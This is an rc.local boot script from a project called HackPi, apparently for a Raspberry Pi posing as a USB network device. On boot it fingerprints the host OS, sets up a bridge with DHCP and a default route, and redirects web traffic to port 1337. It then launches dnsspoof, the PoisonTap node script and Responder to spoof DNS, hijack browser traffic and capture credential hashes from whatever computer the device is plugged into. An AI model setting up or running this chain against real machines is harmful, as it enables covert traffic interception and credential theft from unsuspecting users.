Files
hackpi/rc.local
2017-01-22 18:42:37 -05:00

55 lines
1.4 KiB
Bash

#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.
# Print the IP address
_IP=$(hostname -I) || true
if [ "$_IP" ]; then
printf "My IP address is %s\n" "$_IP"
fi
# Parse USB requests in dmesg
/bin/bash /home/pi/HackPi/fingerprint.sh | tee /home/pi/os.txt
# Stop the dummy gadget and start the real one
modprobe -r g_ether
modprobe libcomposite
# libcomposite configuration
/bin/sh /home/pi/HackPi/gadget.sh | tee /home/pi/HackPi/gadget.log
# Start bridge interface
ifup br0
ifconfig br0 up
# Clear leases
#rm -f /var/lib/dhcp/dhcpd.leases
#touch /var/lib/dhcp/dhcpd.leases
# Start the DHCP server
/sbin/route add -net 0.0.0.0/0 br0
/etc/init.d/isc-dhcp-server start
# Set some other paramaters
/sbin/sysctl -w net.ipv4.ip_forward=1
/sbin/iptables -t nat -A PREROUTING -i br0 -p tcp --dport 80 -j REDIRECT --to-port 1337
# Start some servers
/usr/bin/screen -dmS dnsspoof /usr/sbin/dnsspoof -i br0 port 53
/usr/bin/screen -dmS node /usr/bin/nodejs /home/pi/poisontap/pi_poisontap.js
# Enable Serial
systemctl enable getty@ttyGS0.service
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /home/pi/Responder/; python Responder.py -I br0 -f -w -r -d -F'
exit 0